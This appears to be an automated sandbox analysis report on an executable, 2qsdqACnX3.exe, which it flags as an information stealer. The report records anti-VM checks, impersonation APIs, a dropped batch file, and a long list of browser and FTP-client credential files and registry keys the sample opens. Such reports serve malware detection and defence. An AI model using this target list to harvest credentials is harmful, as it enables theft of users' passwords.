Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 2qsdqACnX3.exe, 00000000.00000003.2013000324.0000000000753000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 2qsdqACnX3.exe | Virustotal: Detection: 77%
Source: 2qsdqACnX3.exe | ReversingLabs: Detection: 94%
Source: unknown | Process created: C:\Users\user\Desktop\2qsdqACnX3.exe "C:\Users\user\Desktop\2qsdqACnX3.exe"
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5990015.bat" "C:\Users\user\Desktop\2qsdqACnX3.exe" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5990015.bat" "C:\Users\user\Desktop\2qsdqACnX3.exe" "
Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Sections loaded: apphelp.dll, userenv.dll, wininet.dll, wsock32.dll, kernel.appcore.dll, uxtheme.dll, netapi32.dll, netutils.dll, samcli.dll, msi.dll, pstorec.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, ieframe.dll, iertutil.dll, version.dll, winhttp.dll, wkscli.dll, secur32.dll, mlang.dll, propsys.dll, samlib.dll, edputil.dll, urlmon.dll, srvcli.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040F9DE GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,0_2_0040F9DE

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File dump: 5990015.bat.0.dr 3880EEB1C736D853EB13B44898B718AB
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Check user administrative privileges: GetTokenInformation, DecisionNodes graph_0-10603
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00403DC3 FindFirstFileA, lstrcmpiA, lstrcmpiA, StrStrIA, FindNextFileA, FindClose
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00404E00 FindFirstFileA, lstrcmpiA, lstrcmpiA, FindNextFileA, FindClose
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_004086C7 FindFirstFileA, lstrcmpiA, lstrcmpiA, StrStrIA, FindNextFileA, FindClose
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00404A90 FindFirstFileA, lstrcmpiA, lstrcmpiA, StrStrIA, StrStrIA, FindNextFileA, FindClose
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00409414 FindFirstFileA, lstrcmpiA, lstrcmpiA, StrStrIA, StrStrIA, lstrlen, StrStrIA, StrStrIA, StrStrIA, FindNextFileA, FindClose
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_00408543 FindFirstFileA, lstrcmpiA, lstrcmpiA, StrStrIA, FindNextFileA, FindClose
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040421A GetVersionExA, GetLocaleInfoA, GetLocaleInfoA, GetModuleHandleA, GetProcAddress, GetNativeSystemInfo, GetSystemInfo
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: 2qsdqACnX3.exe, 00000000.00000002.2034670536.0000000000711000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt3d
            Source: 2qsdqACnX3.exe, 00000000.00000002.2034670536.0000000000711000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 2qsdqACnX3.exe, 00000000.00000002.2034670536.0000000000711000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | API call chain: ExitProcess graph end node graph_0-7525
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040F9DE GetTickCount, wsprintfA, GetModuleFileNameA, GetTempPathA, lstrcat, ExitProcess, CreateFileA, lstrcpy, StrRChrIA, lstrcpy, ExitProcess, lstrlen, CloseHandle, wsprintfA, LoadLibraryA, GetProcAddress, ShellExecuteA
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040F566 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040FF45 SetUnhandledExceptionFilter, RevertToSelf
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040FCA6 lstrcmpiA, LogonUserA, lstrlen, LCMapStringA, LogonUserA, LogonUserA, 746D1B10, ImpersonateLoggedOnUser, RevertToSelf, 746C5030, CloseHandle
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5990015.bat" "C:\Users\user\Desktop\2qsdqACnX3.exe" "
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_004040EF AllocateAndInitializeSid, CheckTokenMembership, FreeSid
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040421A GetVersionExA, GetLocaleInfoA, GetLocaleInfoA, GetModuleHandleA, GetProcAddress, GetNativeSystemInfo, GetSystemInfo
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040FE97 OleInitialize, GetUserNameA
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040421A GetVersionExA, GetLocaleInfoA, GetLocaleInfoA, GetModuleHandleA, GetProcAddress, GetNativeSystemInfo, GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match | File source: 2qsdqACnX3.exe, type: SAMPLE
            Source: Yara match | File source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTR
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\SiteDesigner\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\CuteFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\SharedSettings_1_0_5.ccs
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\SmartFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\RhinoSoft.com\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\SharedSettings.ccs
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\TurboFTP
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\BlazeFtp\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\LeapWare\LeapFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\GPSoftware\Directory Opus\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\AceBIT
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\NetSarang\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FTPInfo\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FileZilla\filezilla.xml
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\RhinoSoft.com\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Program Files (x86)\CuteFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\SharedSettings.ccs
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\GHISLER\wcx_ftp.ini
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FileZilla\recentservers.xml
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\BlazeFtp\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FlashFXP\4\Sites.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\INSoftware\NovaFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FTP Explorer\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FTPGetter\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Program Files (x86)\CuteFTP\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FTPInfo\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FTP Explorer\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\CuteFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\SmartFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\Frigate3\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FileZilla\sitemanager.xml
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\TurboFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\Frigate3\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FTPRush\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FTPGetter\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FlashFXP\3\Quick.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\Estsoft\ALFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\ExpanDrive\drives.js
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\CuteFTP\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\TurboFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\AceBIT\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\TurboFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\BlazeFtp\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FlashFXP\3\Sites.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\SharedSettings.sqlite
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\AceBIT\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\AceBIT\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Windows\32BitFtp.ini
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\wcx_ftp.ini
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FlashFXP\4\Quick.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\NetSarang\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\3D-FTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FTP Explorer\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\NetSarang\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FTPRush\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FlashFXP\3\History.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\CuteFTP\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\FlashFXP\4\History.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Local\Frigate3\
